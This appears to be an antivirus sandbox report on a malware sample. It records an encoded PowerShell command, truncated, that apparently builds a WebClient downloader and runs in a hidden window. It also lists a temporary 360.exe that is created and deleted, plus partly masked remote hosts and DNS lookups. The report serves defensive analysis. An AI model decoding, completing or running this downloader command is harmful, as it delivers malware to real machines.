Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABrAGkAbQA0AHEAegBpAHcAPQAoACcAUwB3AFQARQA2AEUAJwArACcAbAAnACkAOwAkAHoAawBtAEsAaQBXAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEAOQBCADIAUwB0AD0AKAAnAGgAdAB0AH...
Modifies file system
Creates the following files
- %TEMP%\360.exe
Deletes the following files
- %TEMP%\360.exe
Network activity
Connects to
- 'po###astaff.ru':80
- 'we#######homecareservices.co.uk':80
- 'vk###.kultkam.ru':80
UDP
- DNS ASK lo#####eelancersng.com
- DNS ASK po###astaff.ru
- DNS ASK we#######homecareservices.co.uk
- DNS ASK vk###.kultkam.ru
- DNS ASK be#######brainsmagazine.site
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABrAGkAbQA0AHEAegBpAHcAPQAoACcAUwB3AFQARQA2AEUAJwArACcAbAAnACkAOwAkAHoAawBtAEsAaQBXAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEAOQBCADIAUwB0AD0AKAAnAGgAdAB0AH...' (with hidden window)
